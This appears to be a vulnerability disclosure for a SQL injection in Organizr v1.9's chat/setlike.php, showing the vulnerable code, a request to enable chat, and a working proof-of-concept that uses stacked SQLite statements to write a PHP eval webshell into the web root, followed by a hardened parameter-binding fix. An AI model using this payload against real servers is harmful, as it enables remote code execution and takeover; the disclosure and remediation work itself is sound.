I would like to report a SQL injection vulnerability in Organizr-v1.9. This vulnerability can lead to RCE.
Analysis
The path of the vulnerability: chat/setlike.php

```php
$messageid = $_POST["messageid"]; // Line 3 (Source)
...
$db->exec("UPDATE chatpack_log SET liked='0' WHERE id='$messageid'"); // Line 36 (Sink)
```

There is no checking or filtering between the source and the sink, which results in a SQL injection vulnerability.
Permission Description
The vulnerability itself does not require any permission (no permissions required).
However, the initial state of Organizr-v1.9 does not enable Chat, so the data table "chatpack-log" does not exist. Administrator privileges are required to turn this switch on.
You can enable it in the management menu or by sending the following request:

```
POST /ajax.php?a=update-config
Data: authType=internal&chat=true
```

Then visit http://url/chat.php and enter something (no permissions required); now the table "chatpack-log" exists.
PoC

```
POST /chat/setlike.php
Data:
messageid=1'; ATTACH DATABASE 'D:\phpstudy_pro\WWW\cms.organizr19.com\shell.php' AS shell;create TABLE shell.exp (webshell text);insert INTO shell.exp (webshell) VALUES ('\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n' ); /*
```

Note that we used this vulnerability to write a webshell named shell.php to the server, which actually caused RCE.
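As an added example (not Organizr's code), the handler pattern quoted in the analysis above is shown next to a hardened version that validates the id as an integer and binds it as a query parameter, so the database never parses the request value as SQL. It assumes a SQLite database opened through PDO and the table and column names from the report (chatpack_log, id, liked); the demo rows are constructed inline.

```php
<?php
// Added example, not code from the Organizr project. Assumes a SQLite database
// opened via PDO and the chatpack_log(id, liked) schema named in the report.

// Vulnerable pattern as described in the report: the POST value is interpolated
// straight into the SQL string, so a quote ends the literal and the remainder of
// the input is handed to the SQL parser, stacked statements included.
function setLikeVulnerable(PDO $db, array $post): void
{
    $messageid = $post["messageid"];
    $db->exec("UPDATE chatpack_log SET liked='0' WHERE id='$messageid'");
}

// Hardened version: check the type first, then bind the value as a parameter.
// Returns true only when exactly one row was updated.
function setLikeHardened(PDO $db, array $post): bool
{
    $messageid = filter_var(
        $post["messageid"] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($messageid === false) {
        return false; // anything that is not a positive integer id is rejected
    }
    $stmt = $db->prepare("UPDATE chatpack_log SET liked = '0' WHERE id = :id");
    $stmt->bindValue(':id', $messageid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount() === 1;
}

// Self-contained demo against an in-memory SQLite database (constructed data).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE chatpack_log (id INTEGER PRIMARY KEY, liked TEXT DEFAULT '1')");
$db->exec("INSERT INTO chatpack_log (id) VALUES (1), (2)");

// A well-formed id behaves the same in both versions.
var_dump(setLikeHardened($db, ['messageid' => '1']));       // bool(true)

// A quote-terminated value is refused before any SQL is built; the vulnerable
// function would instead pass the whole string to $db->exec().
var_dump(setLikeHardened($db, ['messageid' => "1'; --"]));  // bool(false)
```

Binding the parameter closes the injection itself. The file-write primitive the report relies on is a separate layer: it only works when the database engine can create files inside a web-served directory, so running the web process with no write access to the document root limits the impact of any remaining injection.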
Manual verification